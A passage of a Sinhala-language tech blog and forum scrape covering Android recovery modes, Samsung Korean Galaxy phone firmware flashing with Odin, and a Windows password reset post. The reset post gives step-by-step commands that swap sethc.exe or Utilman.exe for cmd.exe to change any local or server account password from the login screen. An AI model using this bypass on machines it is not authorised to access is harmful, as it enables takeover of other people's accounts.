යන්න පුළුවන්.ගිහින් බැලුවට කමක් නෑ දැකලා නැත්නම්.මුකුත් කරන්න යන්න එපා හැබැයි.මෙන්න මේ recovery mode එක ගොඩක් වැදගත් වෙන්නේ custom ROM එකක් එහෙමත් නැත්නම් kernel එකක් එහෙමත් නැත්නම් modded apk එකක් flash කරන්න යනකොටයි.මේවා ගැනත් පස්සේ හෙමීට කියලා දෙන්නම්. සාමාන්‍යයෙන් නම් built-in තියෙන්නේ CWM(ClockWorkMod) recovery එකයි.නමුත් මේ recovery එකේ user friendliness නම් අන්තිමයි.මොකද කිව්වොත් up/down/back/select කරන්න touch buttons නැතිකම.මේකේ ඒ දේවල් වලට පාවිච්චි වෙන්නේ (power/home/vol up/vol down) buttons.ඉතින් මේක හරි කරදරයක් නිසා අපේ advanced android developers අයියලා මේකට හොඳ විසඳුමක් විදියට PhilZ Touch නමින් එම CWM recovery එකේම touch user interface එකක් තියෙන advanced mode එක හඳුන්වාදුන්නා.ඒ වගේම TWRP recovery එක හඳුන්වාදුන්නේ Team Win Recovery Project විසින්.මම නම් මගේ ෆෝන් එකේ flash කරලා තියෙන්නේ මෙන්න මේ TWRP recovery එක තමා.මේක පාවිච්චි කරන්න ප්‍රධානම හේතුව තමයි මේ TWRP recovery mode එක නිතර update වෙන එක.ඒ නිසා අලුත් features ගොඩක් මේකේ තියෙනවා.මේවත් විස්තර සහිතව පසුවට කියලා දෙන්නම් හොඳේ.මේ පහළ තියෙන්නේ TWRP site එක.ගිහින් බැලුවට කාරි නෑ. http://teamw.in/Devices/ .................................................. .....................................

Tuesday, March 17, 2015

Wednesday, March 4, 2015

Windows Password Reset කරමු.

wink Windows Password Reset කරමු.. 


කට්ටියටම මේ වගේ දේවල් වෙලා ඇති නේ..
දැන් කියන්න යන්නේ මේ වගේ වෙලාවට Password එක Reset කර ගන්න විදියක් ගැන..
කලින් මේක ගැන ගිය thread
http://www.elakiri.com/forum/showthread.php?t=1408965
http://www.elakiri.com/forum/showthread.php?t=1663984

හැබයි මන් කියන්න යන්නේ නම් මීට වඩා වෙනස් ක්‍රමයක්..
Sticky key Function එක හරි Ease of Access programme එක use කරල password reset කරගන්න විදියක් තමා මේක..
දන්න එවුන් කට වහගනිල්ලා...

වෙනත් ක්‍රම වලට වඩා මේ ක්‍රමය වෙනස් වෙන්නේ, අපිට Third party tools මොනවත් use කරන්න ඕන නෑ මේ ක්‍රමයට කරද්දි..
ඒ වගේම server එකක password එකක් වුනත් වෙනස් කරන්න පුලුවනි..

මේකට ඕන Windows installation CD\DVD or Pen Drive 1k විතරයි..

මෙන්න මෙහෙමයි කරන්නේ..
මුලින්ම Windows installation එකට boot කරන්න..



දැන් SHIFT+F10 key press කරන්න.. එතකොට Command Prompt එක launch වේවී.. මෙන්න මේ වගේ..



දැන් තියෙන්නේ windows install කරල තියෙන partition එකේ letter එක හොයා ගන්න එක…
එකට කරන්න තියෙන්නේ,
diskpart command එක දීලා,
එතනින් list volume command එක දෙන එක…
දැන් ඒවී මේ වගේ..



Windows install කරල තියෙන partition එකේ letter එක හොයාගන්න පුලුවන් නේ දැන්...



මගේ නම් drive letter එක D ..
හරි එහෙනම්.. දැන් තමා වැඩේ පටන් ගන්නේ..
අදාළ partition එක ඇතුලට යන්න..
මේ command එක use කරන්න (Drive_letter): Eg- C: or D:
ඊට පස්සේ windows\system32 path එකට යන්න..
cd windows\system32 Command එක use කරලා...



දැන් කරන්න තියෙන්නේ පොඩි copy & paste වැඩක්..
මෙන්න මේ command ටික තමයි ගහන්න ඕනී..
1st Method
Sticky key Function එකෙන් password reset කරනව නම්..
  1. Copy sethc.exe sethc.exe.bak
  2. Copy cmd.exe sethc.exe



2nd Method
Ease Access Programme එකෙන් password reset කරනව නම්..
  1. Copy Utilman.exe Utilman.exe.bak
  2. Copy cmd.exe Utilman.exe



මේ ක්‍රම දෙකෙන් එකෙන් එකක් කරාම ඇති හොඳද..
හරි දැන් ඉතින් Restart කරන්න..

1st method එකේ විදියට කරා නම් login screen එක ආවට පස්සේ..
SHIFT key එක පස් පාරක් (five times) එක දිගට press කරන්න..
දැන් Command prompt එක ඇවිල්ලා ඇති..
net user command එක ගහලා දැන් තියෙන User Account බලා ගන්න..
net user (username) (password) command එකෙන් Password වෙනස් කරගන්න..
username කියන තැනට password වෙනස් කරන්න ඕන user account එකේ නම..
password කියන තැනට අලුත් password එක..



දැන් ඉතින් අලුත් password එක use කරලා log වෙන්න තියෙන්නේ..

2nd method එකේ විදියට කරා නම් login screen එක ආවට පස්සේ
ඔය කහ පාට ඊතලය දාලා තියෙන icon එක උඩ click karanna..



දැන් ඉතින් කලින් වගේම තමා..
Command prompt එක load වෙයි..
කලින් වගේම net user commands වලින් password reset karaganna පුලුවනි..



හරි එහෙනම් password එක reset කර ගත්තනේ..

දැන් තියෙන්නේ වෙනස් කරපු programme files හරියට හදන එක..
කලින් විදියටම Windows installation එකට boot කරන්න..
Command prompt එක අරන් windows\system32 path එකට යන්න..
1st Method එක use කරා නම්..
Copy sethc.exe.bak sethc.exe command එක use කරන්න..



2nd Method එක use කරා නම්..
Copy Utilman.exe.bak Utilman.exe command එක use කරන්න..



Sources
ScreenShot දාලා තියෙන්නේ Server 2012 එකේ වුනාට බය වෙන්න එපා..
Windows 7, Windows 8, Windows 8.1, Windows XP වලටත් වැඩ කරනවා.. 
FingerPrint password තියෙන ඒවා නම් කියන්න දන්නේ නෑ... 

ඔන්න මේක දැනගෙන වැරදි වැඩ කරන්නේ එහෙම නෑ හොඳද… 
හරිනේ එහෙනම්..

Korean Anycall Galaxy Phones

මම මේ thread එක දැම්මෙ Korean Anycall Galaxy S phone 
|
දැන් second-hand market එකේ Korean Anycall Galaxy S වැහි වැහලා. 

|
තාමත් සමහරු රැවටිලා GT-I9000 එක කියලා හිතගෙන SHW-M110S එක ගන්නවා..
|
|
දැන් හුඟක් ඒවා එන්නෙ areal එක කපලා Original Galaxy S back cover එක දාලා..
|
ඒ මදිවට battery එක යට sticker එකත් GT-I9000 කියලා ගහපුවා මම දැකලා තියෙනවා..
|
සමහරු ඕවට GT-I9000 firmware එක ගහලා වැඩේ අනාගන්නවා.. මාත් නොදන්න කාලෙ ඒ කට්ට කෑවා..
|
මේ phone කේ තියෙ
 SMS 80 character limit එක, නා නැති Korean apps හෙම හුඟක් අට දිවන්නෑ.
|
එහෙම කට්ටියට SHW-M110S ගැන තියෙන ඕනම ප්‍රශ්නයක් මෙතන අහන්න..  මම පුළුවන් හැමදෙයක්ම කියලා දෙන්නම්.
|
SHW-M110S 20,25ක් flash කරලා දැන් මේ phone එක ගැන හොඳ දැනුමක් තියෙනවා..



Update - Anycall Galaxy SII (M250K/S) එක ගැන උනත් ඕනා 
දෙයක් මෙතනම න්න.. 



(#2
Old

 
Posts: 8,981
Join Date: May 2009

-------------------------------------

Samsung USB Drivers for Mobile >> http://www.4shared.com/zip/8LzpACGU/...r_Mobile_.html


-------------------------------------

Flash Tool - Odin >> http://www.4shared.com/zip/VR-jhkAU/Odin3_v13.html

Samsung Stock ROM WF07 >> http://www.4shared.com/file/2kn5H-Ir...E-IMAGE-R.html

GFAN WF07 SP 8 XDA Version >> http://www.mediafire.com/?hkkzaqkqke9gqqt

Odin Flash Guide >> http://hdtechvideo.com/community/ind...ep-by-step.64/


-------------------------------------

Flash Tool - Heimdall >> https://github.com/downloads/Benjami....3.2-win32.zip

Stock Heimdall Suit >> 
http://www.mediafire.com/?dkb1v53q6g54b58
http://www.mediafire.com/?208p10tkbki6w40

GFAN Heimdall Suit >> http://www.4shared.com/rar/dks17lBI/...FTE9K-WF0.html

Heimdall Flash Guide >> 
http://forum.xda-developers.com/show...40&postcount=2


Firmware links source - XDA PIT Stop
***
 මේ GFAN Rom දැම්මට පස්සෙ host file එකේ පොඩි edit එකක් කරගන්න තියෙනවා. 
නැත්නම් Play Store යන්න බෑ..
root explorer එකෙන් etc/hosts කියන file එක open කරලා 74.125.93.113 android.clients.google.com කියලා තියෙන එක ඉස්සරහට # එකක් දාලා save කරන්න.

------------------------------------------

Menna magenuth guide ekak..

Galaxy S Flash Guide>> 


1. මුලින්ම 
usb driver එකයි Flash කරන්න හිතන් ඉන්න firmware version එකයි Odin3 v1.3 එකයි download කරගන්න.
2. ඊටපස්සෙ download කරගත්තු usb driver එක install කරලා pc restart කරගන්න!

3. ඊට පස්සෙ phone එක Download Mode එකට Reboot කරගන්න. ඒක කරන්න phone එක මුලින් fully shutdown කරන්න. 
ඊට පස්සෙ Home button + power button එකපාර press කරන්න. එතකොට කහපාට logo එකක් එක්ක Download Mode එකට වැටෙයි.

4. 
ඊට පස්සෙ Odin3 v.1.3 එක run (win vista or 7 නම් run as administrator) දෙන්න.

5.
 ඊට පස්සෙ phone එක pc එකට usb cable එකෙන් connect කරන්න. එතකොට මේ පහල තියෙන්නෙ පිංතූරයේ මම 1 කියලා පෙන්නලා තියෙන්වා වගේ phone එක detect කරයි.
6. ඊට පස්සෙ 2 කියල පෙන්නල තියෙන තැනට(PDA) දෙන්න තියෙන්නෙ download කරගත්තු firmware එක extract කරාම එන .tar or tar.md5 කියන file එක.
* සමහර firmware package එන්නෙ files 3ක් විදිහට. ඒවගේ ඒවට PDA,PHONE,CSC කියන තැන් වලට අදාල files 3 හරියට add කරාම හරි.

7. 
ඔක්කොම ගානට තියෙනවානම් Start(3) දෙන්න.. 
** Start දුන්නට පස්සෙ ඔක්කොම ඉවර වෙලා phone එක reboot වෙනකන් මුකුත්ම අල්ලන්න යන්න එප!!


8. Firmware එක install උනාට පස්සෙ phone එක Auto reboot වෙයි. ඒ initial boot එකට ටිකක් වෙලාව ගන්නවා..


---------------------------------------------


Galaxy SII Flash Guide>>

Download Links >>

Samsung USB Drivers for Mobile 
http://www.4shared.com/zip/8LzpACGU/...r_Mobile_.html

Flash tool(Odin3 V3.04)
http://www.4shared.com/zip/MIafVVwi/Odin3-v304.html

JellyBean 4.1.2 for GT-I9100
[URL="http://d-h.st/IW5[/URL]


*** මුලින කියන්න ඕනා Anycall Galaxy SII M250K/S වලට GT-I9100 firmware දාන්න පුළුවන් කිසි අවුලක් නැතිව.
එතකොට phone එක 100% international version එක වගේ වෙනස් වෙනවා.. 


1. මුලින්ම download කරගත්තු usb driver එක install කරලා pc restart කරගන්න!

2. ඊට පස්සෙ phone එක Download Mode එකට Reboot කරගන්න. ඒක කරන්න phone එක මුලින් fully shutdown කරන්න( vibration එක දැනෙනකන් ඉන්න!). 
ඊට පස්සෙ Down volume key+ Home button + power button එකපාර press කරන්න.
එතකොට warning screen එකක් එනවා, ඒතකොට Volume up key එක press කරාම Download Mode එකට යනවා!



3. ඊට පස්සෙ Odin v.3.04 එක run (win vista or 7 නම් run as administrator) දෙන්න.

4. ඊට පස්සෙ phone එක pc එකට usb cable එකෙන් connect කරන්න. එතකොට මේ පහල තියෙන්නෙ පිංතූරයේ මම 1 කියලා පෙන්නලා තියෙන්වා වගේ phone එක detect කරයි.

5. ඊලඟට 2 කියලා පෙන්නල තියෙන තැන image එකේ select කරලා තියෙන ඒවා විතරක් check කරන්න(tik එක දාන්න).

6. ඊට පස්සෙ 3 කියල පෙන්නල තියෙන තැන field වලට දෙන්න තියෙන්නෙ download කරගත්තු firmware (I9100XXLSJ_I9100OXXLS1_OXX) එක extract කරාම එන files.
PDA කියන තැනට CODE_I9100XXLSJ.tar
PHONE කියන තැනට MODEM_I9100XXLS6.tar
CSC කියන තැනට CSC_HOME_OXX_I9100OXXLS1.tar කියන පිළිවෙලට දෙන්න

* ඒවගේම PIT කියලා තියෙන තැනට අදාල 16/32 pit file එක දෙන්න ඕනා. Anycall හුඟක් එන්නෙ 16GB ඒවා. ඒවාට emmc_EXT4_16GB.pit කියන එක දෙන්න.
7. ඔක්කොම ගානට තියෙනවානම් Start දෙන්න..

** Start දුන්නට පස්සෙ ඔක්කොම ඉවර වෙලා phone එක reboot වෙනකන් මුකුත්ම අල්ලන්න යන්න එප!! 

8. Firmware එක install උනාට පස්සෙ phone එක Auto reboot වෙයි. ඒ initial boot එකට ටිකක් වෙලාව ගන්නවා..